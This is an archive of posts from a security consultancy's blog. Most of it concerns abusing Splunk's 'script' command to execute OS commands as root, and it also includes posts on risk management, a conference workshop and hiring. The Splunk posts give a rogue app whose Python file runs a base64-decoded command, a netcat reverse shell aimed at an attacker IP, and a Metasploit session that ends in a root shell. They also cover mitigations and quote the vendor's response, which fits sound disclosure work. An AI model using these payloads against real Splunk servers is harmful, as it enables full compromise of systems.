Tuesday, 18 December 2012

CLI Virtual Host Checker bingip


Google rocks right? Well, there’s still one feature it lacks compared to Bing – the ability to search by IP address. 

On bing.com you can use ip:<IP address> and it will return pages indexed from that IP address which, as a security guy is a really useful way of enumerating virtual hosts belonging to a web server.

However, a fancy web page of results is not much use to the average penetration tester, we like text files which we can then pass into all sorts of other tools and scripts that we come up with.  

There seem to be a few command line tools which dealt with gathering data from Google but in my brief search on a BT5 instance there wasn’t one which did what I wanted, so as all good testers would do, I wrote one.

bingip is a really simple tool that makes a request to bing.com to determine domains hosted at that IP, returning each in plain-text on a new line.  

It’s a very simple script at the moment and can only handle up to 50 domains (due to the page limit on Bing - I will update to use API at some point) and of course, can break as soon as Bing change their website – but I’ll try and keep on top of that.

CHRISTMAS UPDATE:
As it's Christmas we've added some new features to bingip.




It now accepts a file of IP addresses as input and, more usefully I think, it accepts an Nmap XML file too. 


This means you can run your standard Nmap scans as normal and, when you're done use bingip to find which websites are hosted on the target IP addresses. 

A simple example would be:

nmap -p 80 -oX bingip_example.xml scanme.nmap.org

Now pass the file generated as an argument and bingip will automatically extract hosts with web server ports:


bingip.py --nmap_file bingip_example.xml 
74.207.244.221
--------------
scanme.nmap.org 


You can download the tool and see further examples over on our Github page at https://github.com/7Elements/bingip.

Wednesday, 14 November 2012

[Quick Post] Securing Splunk Free Authentication


Following up on my post earlier about abusing Splunk functionality, one of the issues Splunk administrators face when deploying the Free version is the lack of authentication. I just had a very quick and simple thought for anyone running it on Linux/Unix. I suggest simply that you bind SplunkWeb to localhost only and use SSH tunnels to access it.

It doesn't give you any kind of granularity over permissions within Splunk itself and it's not appropriate for all user types but for systems/IT folk who, in my experience make up a decent percentage of users, it could be a good option. It's likely they already have local OS accounts on the Splunk server anyway.

In order to configure Splunk to listen on localhost only a simple configuration change is required to the following file.

$SPLUNK_HOME/etc/system/default/web.conf

$SPLUNK_HOME is /opt/splunk by default. Uncomment and set the following configuration item as follows:

server.socket_host = localhost

Now restart SplunkWeb:

$SPLUNK_HOME/bin/splunk restart splunkweb

Check that's it listening as you expected using a quick netstat on the Linux box:

$ netstat -an | grep 8000
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN 

Nice. Now we need to SSH to the Splunk server and set up our tunnel. I'll give a quick example using OpenSSH, if you're a Windows user PuTTY is your friend (other Windows SSH clients are available). On *your own* machine execute:

$ ssh -L8000:127.0.0.1:8000 splunk-linux.local

Authenticate as normal and your local port 8000 is forwarded to 127.0.0.1:8000 on the Splunk server so you can now access your Splunk Free instance by connecting to http://localhost:8000. This at least restricts access to valid users on the Linux server which is a big step up from the default. It's also more restrictive than (though works nicely in combination with) host-based firewalling on the server.

Abusing Splunk Functionality with Metasploit

In our post Splunk: With Great Power comes Great Responsibility we outlined how the sheer power and flexibility of Splunk can be abused to gain complete control of the server upon which Splunk is running. We ran through the creation of a custom application to upload through SplunkWeb, which facilitates OS command execution in the context of the Splunk OS user - which is root/SYSTEM by default.

Creating a custom application and manually specifying the arbitrary commands you wish to run is time consuming and unnecessary when we have powerful scripting languages and frameworks to do the legwork for us. Originally I developed a standalone ruby tool, which I released and demoed during a Lightning Talk at BruCON 2012 (and literally wrote during some of the talks there). However, after constant harassment a suggestion from @ChrisJohnRiley, I have developed a module for the Metasploit Framework. A pull request has been submitted, so hopefully it will be included in the main Metasploit Framework. However, until then you can clone from the 7 Elements Github repository as follows (I'll assume you're running a Unix based OS, you're on your own with Windows).

(Optional) Create a directory to store the 7E metasploit modules

$ mkdir ~Development/7Elements
$ cd Development/7Elements

Clone the code from our Github repository

$ git clone https://github.com/7Elements/msf_modules.git
Cloning into 'msf_modules'...
remote: Counting objects: 53, done.
remote: Compressing objects: 100% (30/30), done.
remote: Total 53 (delta 4), reused 44 (delta 3)
Unpacking objects: 100% (53/53), done.

Now set up your Metasploit to handle custom modules

$ cd ~/.msf4/
$ mkdir -p modules/exploits/multi/http
$ cd !!:2
cd modules/exploits/multi/http

Create a symlink to the code we cloned from 7E

ln -s ~/Development/msf_modules/modules/exploits/multi/http/splunk_upload_app_exec.rb .

With that done, we can fire up Metasploit and begin exploitation. I am going to attack a local Debian VM which is running a default installation of Splunk 5 (latest version at time of writing) with the Free license activated.


$ msfconsole 

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 983 exploits - 531 auxiliary - 162 post
+ -- --=[ 262 payloads - 28 encoders - 8 nops

msf > use exploit/multi/http/splunk_upload_app_exec 
msf  exploit(splunk_upload_app_exec) >

Let's have a look at the options available.

msf  exploit(splunk_upload_app_exec) > show options

Module options (exploit/multi/http/splunk_upload_app_exec):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   PASSWORD         changeme         yes       The password for the specified username
   Proxies                           no        Use a proxy chain
   RHOST                             yes       The target address
   RPORT            8000             yes       The target port
   SPLUNK_APP_FILE                   yes       The "rogue" Splunk application tgz
   USERNAME         admin            yes       The username with admin role to authenticate as
   VHOST                             no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Universal CMD


msf  exploit(splunk_upload_app_exec) > show advanced 

Module advanced options:

   Name           : CommandOutputDelay
   Current Setting: 10
   Description    : How long to wait before requesting command output from Splunk 
      (seconds)

   Name           : DisableUpload
   Current Setting: false
   Description    : Disable the app upload if you have already performed it once

   Name           : EnableOverwrite
   Current Setting: false
   Description    : Overwrites an app of the same name. Needed if you change the app 
      code in the tgz

   Name           : ReturnOutput
   Current Setting: true
   Description    : Display command output


As discussed, exploiting this feature requires an admin level user in Splunk. The username and password are preset to admin and changeme which are the Splunk defaults. On the Free license it actually doesn't matter as there's no authentication anyway.

You will need to set SPLUNK_APP_FILE. By default it will look in the main Metasploit data folder for the provided tar.gz app which means if it ever makes it to the main trunk you won't need to change it by default. For now we set this to the tar.gz provided in the msf_modules directory.

We also set our target (RHOST), our payload (in this case reverse netcat) and the target IP for our payload (LHOST). Everything else we can leave as default.

msf  exploit(splunk_upload_app_exec) > set RHOST splunk-linux.local
RHOST => splunk-linux.local
msf  exploit(splunk_upload_app_exec) > set SPLUNK_APP_FILE /Users/marc/Development/7Elements/msf_modules/data/exploits/splunk/upload_app_exec.tgz
SPLUNK_APP_FILE => /Users/marc/Development/7Elements/msf_modules/data/exploits/splunk/upload_app_exec.tgz
msf  exploit(splunk_upload_app_exec) > set PAYLOAD cmd/unix/reverse_netcat 
PAYLOAD => cmd/unix/reverse_netcat
msf  exploit(splunk_upload_app_exec) > set LHOST 172.16.125.1
LHOST => 172.16.125.1

Now we exploit :-)

msf  exploit(splunk_upload_app_exec) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.125.1:4444 
[*] Using command: nc 172.16.125.1 4444 -e /bin/sh 
[*] authenticating...
[*] fetching csrf token from /en-US/manager/launcher/apps/local
[*] uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] invoking script command
[*] waiting for 5 seconds to retrieve command output
[*] Command shell session 1 opened (172.16.125.1:4444 -> 172.16.125.134:47893) at 2012-11-13 15:37:07 +0000
[*] fetching job_output for id 1352821067.8
[*] command returned:

msf  exploit(splunk_upload_app_exec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root)


The usual post-exploitation can now ensue of course. On a recent test I used this method to compromise a host which, among other things, turned out to be running the TACACS+ service for the network. I gained enable access to all Cisco devices in the environment.


In the previous post I also showed how you can retrieve the output from commands. The example I gave was against an Enterprise install running on Windows Server 2008 R2. Let's pop that puppy with our metasploit module too.

msf  exploit(splunk_upload_app_exec) > set RHOST splunk-windows.local
RHOST => splunk-windows.local
msf  exploit(splunk_upload_app_exec) > set USERNAME marc
USERNAME => marc
msf  exploit(splunk_upload_app_exec) > set PASSWORD Password100
PASSWORD => Password100
msf  exploit(splunk_upload_app_exec) > set PAYLOAD generic/custom 
PAYLOAD => generic/custom
msf  exploit(splunk_upload_app_exec) > set PAYLOADSTR cmd.exe /c systeminfo
PAYLOADSTR => cmd.exe /c systeminfo

Now exploit!

msf  exploit(splunk_upload_app_exec) > exploit
[*] Using command: cmd.exe /c systeminfo
[*] authenticating...
[*] fetching csrf token from /en-US/manager/launcher/apps/local
[*] uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] invoking script command
[*] waiting for 5 seconds to retrieve command output
[*] fetching job_output for id 1352823090.12
[*] command returned:
msf  exploit(splunk_upload_app_exec) > 

Oh dear. What happened there? The command didn't return any output. Splunk uses an internal job scheduler in order to process commands so the way we retrieve output is by polling the job control service for any output returned. By default we do this 5 seconds after we execute the script but some commands take longer than this to return. systeminfo, as most of you will know, is not a fast command.

The solution is to increase the time the module waits before it asks for output using the advanced option CommandOutputDelay. Let's try 10 seconds:

msf  exploit(splunk_upload_app_exec) > set CommandOutputDelay 10
CommandOutputDelay => 10
msf  exploit(splunk_upload_app_exec) > exploit

[*] Using command: cmd.exe /c systeminfo
[*] authenticating...
[*] fetching csrf token from /en-US/manager/launcher/apps/local
[*] uploading file upload_app_exec.tgz
[*] upload_app_exec successfully uploaded
[*] fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
[*] invoking script command
[*] waiting for 10 seconds to retrieve command output
[*] fetching job_output for id 1352823591.13
[*] command returned:
Host Name:                 IIS1
OS Name:                   Microsoft Windows Server 2008 R2 Standard"
OS Version:                6.1.7600 N/A Build 7600"
OS Manufacturer:           Microsoft Corporation"
OS Configuration:          Standalone Server"
OS Build Type:             Multiprocessor Free"
Registered Owner:          Windows User"
Registered Organization:"
Product ID:                00477-001-0000421-84537"
Original Install Date:     25/08/2012"
System Boot Time:          12/11/2012"
System Manufacturer:       VMware"
System Model:              VMware Virtual Platform"
System Type:               x64-based PC"
Processor(s):              2 Processor(s) Installed."
...snip...

Ah. That's better.

Splunk: With Great Power Comes Great Responsibility

Splunk background

Splunk is a fantastically powerful solution to "search, monitor and analyse machine-generated data by applications, systems and IT infrastructure" and it's no surprise that many businesses are turning to it in order to help meet some of their compliance objectives. Part of Splunk's power comes from its query language and custom application capability. If a user wants to enhance the features of Splunk, maybe to parse and group disparate log entries together into a transactional view, this can all be done. On top of this, a healthy marketplace for Splunk Apps has grown up on the SplunkBase community website.

Splunk Applications

Splunk Apps are a collection of scripts, content and configuration files in a defined directory structure which are then uploaded to the Splunk server  for addition to the App list. This allows authorised users access to the queries and actions that it can perform. In order to upload an App through the web interface the Splunk user requires (by default) 'admin' role.


A bit more power than you thought for?

Splunk offer a very powerful command called script which allows admin-level Splunk users to make "Makes calls to external Perl or Python programs". This is very useful for a number of reasons but is particularly interesting to an attacker who has gained administrative access to a Splunk server.

Nothing new here really. Lots of apps allow authenticated users to upload custom content and every one of them is potentially vulnerable if they do not adequately ensure that this cannot be abused. The main difference with Splunk is two-fold in my opinion.

Firstly, by default Splunk runs as root (on Unix, LocalSystem on Windows). This is far better from an attacker's perspective than, for example, the web server user.

Secondly, in the free version of Splunk there is no authentication at all and it logs you directly in as admin. The Enterprise version does provide authentication and granular permission control. However, as disclosed by Sec-1 in November 2012, it does not protect against brute-force attacks on the login page which leaves it vulnerable. I verified this against the latest version 5 which was recently released with a simpler Burp Intruder attack. As you can see, password attempt 100 succeeds.


Splunk runs over HTTP not HTTPS by default, though HTTPS is a simple click away (more on that later). This means there is also a risk of credential capture over the network by a suitably placed Man-In-The-Middle.

Summarising quickly, what we have here is a "feature" not a vulnerability however, as you will see, Splunk has powerful functionality which can be abused with significant security implications.

Splunk, out of the box:

1) Allows the definition of custom applications
2) Custom applications can execute arbitrary python or perl scripts
3) Runs as root (or SYSTEM) by default

What could possibly go wrong? We're about to find out.

Building a "rogue" Splunk App

Splunk Apps can be very complicated affairs with the possibility of hooking into the SplunkWeb MVC framework to define custom controllers and views for rendering your data. Our needs are actually very modest so we will create the minimum required for our goal: arbitrary OS command execution.

Splunk Apps are installed to $SPLUNK_HOME/etc/apps on the Splunk server. Each app has its own directory, usually named after the app. There are three ways to get an App onto a Splunk server:

1) Manually copy to $SPLUNK_HOME/etc/apps
2) Install from SplunkBase through the SplunkWeb UI
3) Define or upload through the SplunkWeb UI

Option 1 is obviously not available to us at this stage, if we had this kind of access and privilege on the server already we likely wouldn't need this attack.

Option 2 is an interesting potential attack vector which I plan to explore in the future. I do not know what checks are made my Splunk when you submit an app to SplunkBase. Analogous to the smartphone App Stores there is a great risk associated with installing arbitrary code into your environment particularly, as we demonstrate in this post, it runs with such privilege by default.

The Splunk Developer Agreement certainly seems to know what's possible, it states:

(d) Your Application will not contain any malware, virus, worm, Trojan horse, adware, spyware, malicious code or any software routines or components that permit unauthorized access, to disable or erase software, hardware or data, or to perform any other such actions that will have the effect of materially impeding the normal and expected operation of Your Application.

A topic for another day perhaps.

So, Option 3 it is then. You can manually define the files through the UI but that's slow. The easiest way is to create the folder structure and files locally, then produce a tar.gz archive from it and upload.

We will create an app called upload_app_exec. It will contain the following:


upload_app_exec
upload_app_exec/bin
upload_app_exec/bin/msf_exec.py
upload_app_exec/default
upload_app_exec/default/app.conf
upload_app_exec/default/commands.conf
upload_app_exec/metadata
upload_app_exec/metadata/default.meta

app.conf - defines information about app, including version number and visibility in the UI. This is important for our attack later.


[launcher]
author=Marc Wickenden
description=With great power....
version=1.3.3.7

[ui]
is_visible = true

commands.conf - This defines the name of our command to pass to "script" in Splunk. This ties our arbitrary python or perl to the Splunk UI
[pwn]
type = python
filename = pwn.py
local = false
enableheader = false
streaming = false
perf_warn_limit = 0

default.meta - For our purposes, this defines the scope of our commands. We export to "system" which basically means all apps. < br />
[commands]
export = system

pwn.py - The meat and potatoes. This is our arbitrary python script which Splunk will run. This could be even simpler that what I have defined here however, by using the splunk.Intersplunk python libraries provided we are able to capture output from commands executed and present back to Splunk cleanly.
As you can see, we pass in a single argument which is a base64 encoded string (easier as it avoids browser encoding issues and handling multiple arguments in here or in Splunk.

import sys
import base64
import splunk.Intersplunk

results = []

try:
        sys.modules['os'].system(base64.b64decode(sys.argv[1]))

except:
        import traceback
        stack = traceback.format_exc()
        results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))

splunk.Intersplunk.outputResults(results)

With everything in place we simply tar/gz this directory up ready.

$ tar cvzf upload_app_exec.tgz upload_app_exec
a upload_app_exec
a upload_app_exec/bin
a upload_app_exec/default
a upload_app_exec/metadata
a upload_app_exec/metadata/default.meta
a upload_app_exec/default/app.conf
a upload_app_exec/default/commands.conf
a upload_app_exec/bin/pwn.py

Now we head over to our Splunk system to complete the upload. I will demonstrate this with a default installation of the latest (at time of writing) version 5 of Splunk on a Debian 6 box. The only thing I have configured in Splunk is activating the Free License rather than the default trial Enterprise license included.

For completeness I simply ran:

dpkg -i splunk-5.0-140868-linux-2.6-intel.deb
/opt/splunk/bin/splunk start

Uploading the App

Open your browser and type in the address for your target Splunk instance. In this example my Debian box is splunk-linux.local on the default port of 8000. By default you will be greated by the launcher app.

 Click on the Apps menu on the right-hand side.
 Then "Install app from file" and select the tar.gz we created in the previous steps.
You should receive a message to say the app installed successfully. Now access it from the App dropdown menu at the top right of the screen.
 You will be presented with the timeline interface for our new app.
Exploitation

If you recall from earlier, our command will be supplied as a base64 encoded string. For this demonstration I will pop a reverse netcat shell to my waiting listener. Generating base64 is a doddle but just in case you want some command-line fu:

OS X/Linux:

$ echo -n 'nc -e /bin/sh 172.16.125.1 4444' | base64
bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Windows Powershell:

PS> [System.Convert]::ToBase64String([System.Text.Encoding]:
:UTF8.GetBytes('nc -e /bin/sh 172.16.125.1 4444'))
bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Now set up a listener for our netcat reverse shell on port 4444 with:

$ nc -vln 4444

Finally, time to trigger the command execution and get our shell. In the Splunk search box type the command to pipe the search results (which are irrelevant to us) to our script command:

* | script pwn bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTI1LjEgNDQ0NA==

Profit:


We can also return the output of a command to Splunk for display in the browser. This time I will demonstrate using Splunk for Windows just to show it's a universal problem. Again using a default installation of 5 on Windows Server 2008 R2 except this time it has an Enterprise license.

Upload the same app as before but this time we will issue the systeminfo command which will run as NT AUTHORITY\SYSTEM.

Automation

The process itself is very simple but wouldn't it be even better if some kind soul had developed this functionality for the Metasploit Framework? It's your lucky day, head on over to the second blog post in this series for all the details: Splunk Functionality Abuse with Metasploit.


Fixing it

Splunk have been contacted for advice on this threat but have so far not responded. We will update this blog with their official response as and when we receive it.

UPDATE: 15th November 2012
Fred Wilmot at Splunk has been in touch with me and we've had a really good chat about this. He sent me an email addressing each of the points in this post. What is also clear is that Splunk are committed to doing things the "right way". Fred has some great ideas he's working on so hopefully these will come to fruition. I have included Splunk's response at the end.

In the mean time we would suggest at a minimum Splunk administrators implement the advice in Splunk's hardening guide at http://wiki.splunk.com/Community:DeployHardenedSplunk. This will result in an installation which does not run as a privileged user and switches SplunkWeb to use HTTPS. These don't directly address the threat of arbitrary command execution however. Depending on the target of the attack and other implementation details, getting access to a "splunk" user may be enough. Think "data oriented" or "goal oriented" rather than assuming root is required.

I have not been able to identify a way to disable the script command. The main splunkd process is a compiled executable but a lot of the functionality of Splunk is written in Python so there may be a simple way to comment out or redefine the pertinent parts of the application. This would however be a hard-sell to most organisations and rightly so. Particularly Enterprise customers who pay handsomely for their annual support contracts.

I wonder also if Linux/Unix users could chroot the installation without losing functionality. This may be the strongest mitigation available.

For now it seems the best advice we can give is to ensure that no Free Licence deployments of Splunk are available on a network which contains sensitive data. That credentials at an OS level are not shared between Enterprise deployments and Free versions, particularly those accounts with the admin role. Additionally ensure that users with admin role are reviewed regularly and privileges reduced to least privilege. All the usual good advice basically.

If Splunk come back to us with any further advice we will update this post accordingly. I'm particularly interested in the answer to another question I asked them: which other commands or functionality can be (ab)used in this way. If you think of any please add a comment.

END OF ORIGINAL POST

Response from Fred Wilmot at Splunk:


We wanted to respond to your blog post, which I enjoyed reading all three sections.   You express some valid concerns if best practices are not followed.  Let me try to summarize:

Threat Model:
1) Default Splunk runs as root (on Unix, LocalSystem on Windows).
2) No authentication mechanism other than Splunk, default login is administrative
3) lack of HTTPS by default, leaves Splunk cred susceptible to MitM.
4) Potential for data oriented compromise using another Splunk user account.

* create roles and map capability to user based on least privilege (which is default 0 for new accounts)

Summarising quickly, what we have here is a "feature" not a vulnerability however, as you will see, Splunk has powerful functionality which can be abused with significant security implications.

Exploitation:
We certainly are aware of the power of the features of Splunk, and if standard security best practices are bypassed like: privileged local account access, running Splunk as root, and using the free version of Splunk w/o an auth scheme, you have the opportunity to execute scripts  using Splunk and python libs for code execution. 

We designed Splunk to allow roles to add applications both through the User Interface as well as the file system through access.  We also completely agree that the free version's method of authentication is NOT designed for enterprise use, and suggest the primary use case is enabling folks to get used to core Splunk with a volume of daily ingest license as the limiter.   Anyone with the ability to run root, owns the box, and hence, all things.  If we install an app under that context, the same functionality applies.  

Mitigation:
Here are some ways/means to add some controls around feature function-
1) If authenticating to Splunk, use SSL as a standard function when possible, in conjunction with LDAP authentication.  Generate your own keys, don't use Splunk's default keys as well.
2) Provided we follow a roles-based access control approach, we can also limit who is capable of authenticating as a role to Splunk, and thereby what they can do as a function of product features.  this includes searches, views, applications, and many of the administrative functions for running Splunk.
3) We can configure commands.conf to prevent script export to anything outside the application it runs in, including passing authentication as a function of the custom python script.  
4) We can also configure default.meta to add additional controls around the application itself. *.meta files contain ownership information, access controls, and export settings for Splunk objects like saved searches, event types, and views. Each app has its own default.meta file.

5) We can also limit splunk Restrict Search Terms and capabilities specifically.  This can include search parameters aside from script.
5) Do not run Splunk as root.  this is documented for our customers, and a recommended best practices.
6) Do not use the default 'Admin' role for normal usage, create both roles and users in Splunk to assign controls to authorized users. we suggest tying an authentication mechanism such as LDAP or AD.
7) Do not use Splunk authentication as a method for access control in production.
8) MiTM credential attacks happen when not using SSL.  and brute forcing happens w/o strong authentication. Configure Splunk to use SSL and LDAP to mitigate these risks. 


Anyone with the ability to run root, owns the box, and hence, all things.  If we install an app under that context, the same functionality applies.  
from our community Wiki, as you followed, we also include some hardening practices as well.

As an vendor committed to product security, both responsible disclosure practices, best practices and guidance can also be found here.


Suggestions:
I do see an opportunity to limit the capability of script execution as an additional control we can place in the roles capability to limit arbitrary code execution by anyone at the Splunk Application level.  Maybe we limit script loading except through the UI for all non 'Admin' roles? Perhaps assigning a GUID to a script specifically might add granularity here as well. We also have a functionality to monitor and audit user interactivity within Splunk.  We, of course, Splunk that too.

You asked about some operations that may have interesting impacts as you describe with 'script' command, I might suggest the nature of the feature itself allows for this, and should be used with due care, change control, and audit for visibility into add/change/mod.  We designed Splunk to allow folks to upload/download apps to Splunk as a platform from our splunk-base.splunk.com, as well as the community to contribute their context for Splunk as a platform with their applications they have created.

As you said, with great power comes great responsibility; we are very open to suggestions, and feedback on the product.  Thank you very much for both the candor and the feedback, looking forward to hearing more from you.

Best regards,
Fred

Fred Wilmot, CISSP
Security Practice Manager 

Tuesday, 9 October 2012

Threat: The Missing Component.


Threat: The Missing Component.

It is now widely acknowledged that risk management is the best way to manage security and security risks are beginning to be integrated into organisations’ business risk management structures so that they are managed alongside other business risks.  This is a significant step forward but a component is frequently missing from the security risk equation, threat. While there is no easy fix to this, the following blog is about setting the scene, and 'why' threat is an integral part to the overall risk management approach.

What is Threat?

There are many definitions of a threat, but within the context of security risks we will use the following:

An actor that has the intent and capability to carry out an act that could cause harm to an organisation.  

In some instances this is referred to as the cause of a risk. A threat must possess both the intent and capability to carry out the act and these two elements can be used to assess the size of a threat to an organisation.

In this context, the threat is a wilful actor that chooses to undertake the threat.

Threats are not the only cause of risks though.  Some risks may be caused by circumstances or events that do not possess intent or capability, such as adverse weather.  These are referred to as hazards.

Hazards are rarely, if ever, a direct cause of a security risk and as such will not be covered in this blog.

Where does Threat fit into the risk equation?

Again, there are many definitions of a risk but we will use the following:

Any uncertain event that could have an impact on an organisation’s ability to achieve its business objectives.  

These overarching definitions of risk clearly demonstrate the link between the risk and a business’s objectives but they don’t describe what factors come together to make a risk. The following formula lays out the series of key factors required to cause a security risk. Threat is key component of this.

A THREAT exploits a VULNERABILITY that causes an EVENT that has an IMPACT on the business. 

The terms used above are all standard entities used in risk and whilst real life is never that simple most security risks follow the above formula in theory.

Why Threat is important?   

A threat initiates a risk.  It is not until a threat exploits a vulnerability that an event that impacts a business will occur.  Without the threat, the other sequence of events will not be triggered and the consequences would not occur.

Organisations do not need to have knowledge of a defined threat to identify and manage a risk.  The fact that a vulnerability exists, which a threat could exploit, is normally sufficient for an organisation and the threat element is ignored.  The threat though contains a large number of variables that will determine the evolution of the event and its subsequent impact.  The threat determines the timing, nature, size and velocity of an event.

It is these variables that give rise to the uncertainties of the event and therefore its subsequent impact.  A defined and understood threat therefore provides additional information on the security risk that can be used to refine and target controls.

Why is Threat frequently not taken into account?

Despite its clearly important role, threat is often missed out from organisations’ risk management processes.  Threats are difficult to define.  They exist outside of an organisation and therefore the information is difficult to obtain.  In addition, organisations can rarely influence or control a threat, without great cost.

Organisations therefore focus on the internal picture, identifying and managing vulnerabilities, which given the premise that vulnerabilities that could be exploited by a threat should be protected, they have to do anyway.

Whilst understandable, for me this misses a key part out of risk management.  So, how do we take into account threat in the risk management process?

Threat Led Risk Management

The point of risk management is to understand the things that might prevent you from achieving your objectives, and managing them.  It is about information and truly understanding the context in which you operate to enable you to prevent the unforeseen things, which exist outside of your plan, preventing you from achieving your goals.  In this context, the threat is a vital part of the jigsaw puzzle as it provides much greater clarity on the likelihood of a risk occurring and the potential impact.  Whilst risks can therefore be defined using the organisation’s vulnerability and potential impact, a risk cannot be truly quantified without taking into account the threat.  We have termed this Threat Led Risk Management.

Threat Led Risk Management enables organisations to truly undertake risk management.   This of course leaves organisations with a real problem, how do they get the information on threat that they need at a reasonable cost?

Threat Information

Gathering current and accurate information on the threats to a business or organisation is a difficult task.  The information is not easily obtained and in respects of security risks and the likely perpetrators, information on the threat is naturally guarded.  For an organisation to gather information on the threats it faces and keep that information up to date, it would need to develop an effective intelligence network with sufficient sources of information to meet its needs as well as have the capacity to analyse that information. For the majority of organisations this is unachievable.

The resource implications alone are likely to act as a barrier but in addition, the time it would take to establish an effective intelligence network is likely to prevent organisations from going down this route.  In addition, organisations in similar sectors will be replicating work, in effect all seeking the same information and applying it to their businesses.

From a UK plc point of view this is a huge waste of resource to protect our businesses.


A Possible Way Forward

Organisations can obtain threat information from private companies that provide bespoke threat products but there is no guarantee on quality and those with good reputations are expensive.  However, rather than individual organisations undertaking essentially the same intelligence gathering exercises on the same threats, a central  non-competitive system that produces an industry sector specific threat report would provide a cost effective solution to enable organisations to undertake Threat Led Risk Management.   Perhaps this is a role that could be undertaken by the UK Government.

The UK Government is currently seeking to strengthen the business sector’s resilience to attack, particularly in the area of what it calls cyber threats, and has also asked for innovative ideas on identifying and tackling the threat.  (Summarised by the BBC)  The Government’s current focus though appears to be on attaining the information to enable them to act, rather than sharing threat information. Whilst the Centre for the Protection of the National Infrastructure (CPNI) does work with private organisations, and provide security advice, no formal industry specific threat product exists.

The UK Government already has a system and structure in place able to gather intelligence on threats.  It is acknowledged that the UK Government will not be able to share the majority of information on threats and it is not suggested that private companies are given access to all the information.  However, the information could be used to provide a centralised industry sector specific threat product that would enable organisations to better manage their security risks.


Thursday, 13 September 2012

44Con Burp Plugin Workshop Slides and Code available

44Con 2012 has been and gone and attendees seem to agree it was a huge success. I was proud to present my Burp Plugin Development for Java n00bs workshop at the event and on the whole I think it went well.

The demo gods weren't smiling on me which meant there was less audience participation than I had envisaged but in the end we ran over our two hour slot by fifteen minutes with just me talking and working through the demos so it was probably just as well!

I've published the slides on Google Presentations. Most of the content was me talking so make sure you check out the speaker notes as much of the detail is there and I've also included links to the code which is also available on our Github page.

The slides are at https://docs.google.com/presentation/d/1vs1dJw646pmooJ6D2JbJk6nE84aPBquPALA86lzSb-Y/edit and the code is available at https://github.com/7Elements/burp_workshop.

If you want to play along at home you will also need to set up an IIS Application Server and install the WCF service from the RepeatAfterMe folder. This also requires the NOEMAX WCF-Xtensions .NET assemblies available from http://www.noemax.com/downloads/wcfx/wcfx_trial.asp.

You will need to edit the app.config file in the RepeatAfterMeClient to point to the correct location for your IIS server. Change the following section:

         <client>
            <endpoint address="http://192.168.239.141/RepeaterService.svc" binding="extensionBinding" bindingConfiguration="BasicHttpBindingExtended" contract="IRepeaterService" name="BasicHttpBinding_IRepeaterService"/>
        </client>


If you have any questions regarding all of this, feel free to shoot me a message on Twitter.

Wednesday, 12 September 2012

We're hiring!


To help us find the right people, we wanted to give you more information about 7E as a company and what it is we are looking for. 

So what are we about?
Well firstly, we're going from strength to strength.  We aim to improve the way the industry approaches information security and to make a real difference. We deliver high quality technical testing that enables our clients to receive the assurance they need.

We take pride in our approach to customer service and have built an excellent reputation in the delivery of innovative and pragmatic security testing. We deliver a wide variety of engagements and therefore there is always something new to get involved with. Our clients cover multiple business sectors, from small niche providers to large multinational blue-chip organisations and we treat all of them with the same level of dedication.

How do we do this?
We do all of this by putting our clients at the heart of everything we do. Exceptional customer service and delivering high quality products and services every time are central to the way in which we work. Our staff use their technical knowledge to tailor each engagement to the client’s needs and are able to translate technical issues into clear business related impact.

What does it take to work for us?
We are looking for individuals who are technical 'geeks', have a passion for security, but also have that something extra - wanting to make a difference.

Is this you?
If you are motivated in this way, then we want to hear from you. We passionately believe in what we do and if you share this vision then we can offer you the following:
  • Dedicated Time For Research / Training - A minimum of three days each month to work on research and personal training. If you have an innovative / interesting research idea then we will support the required effort to deliver.
  • No Sales / Delivery Targets - We don't have sales or delivery targets at 7 Elements. It is not about selling days, but delivering what the client requires.
  • Work-Life Balance - We believe strongly in a work-life balance, as such all of our staff get 30 days annual leave.
  • Development - We take great pride in providing on-going tailored support and development for our team. You can expect to receive individual training plans as well as attendance at conferences throughout each year.


Sign me up!
For further information or to apply then please send an email to jobs@7elements.co.uk.


7 Elements does not accept agency CVs and will not be held responsible for any fees related to unsolicited CVs.




Tuesday, 28 August 2012

7 Elements to run 44Con Burp Suite Workshop

Our Principal Security Consultant Marc Wickenden will be hosting a workshop at the "UK's permier information security conference and training event" - 44Con - next week in London. The two hour practical workshop "Burp Plugin Development for Java n00bs" will be run on either Thursday or Friday in the Technical Workshop Track.

Highlevel Outline
Burp Suite stands out as the de-facto attack proxy for web application assessments. Part of its power lies in the Burp Extender interface which allows "developers" to extend Burp's functionality, including reading and modifying runtime data and configuration, trigger key actions such as Burp Scanner or extend the Burp user interface itself with custom menus and windows.

"That's great, but I'm not a developer, I'm a webapp tester and I want the goodness too"

This practical workshop will take you from zero to hero even if you've never coded a line of Java in your life. Through some basic hands-on examples I will guide you through the process of getting your machine ready for coding, the key features of Burp Extender and how to use it to solve some real world web application testing scenarios.

Details
A rough agenda for the workshop is as follows:
  • The problem Burp Extender solves
  • Getting ready
  • Introduction to the Eclipse IDE
  • Burp Extender Hello World!
  • Manipulating runtime data
  • Decoding a custom encoding scheme
  • "Shelling out" to other scripts
  • Limitations of Burp Extender
  • Examples of really cool Burp plugins to fire your imagination
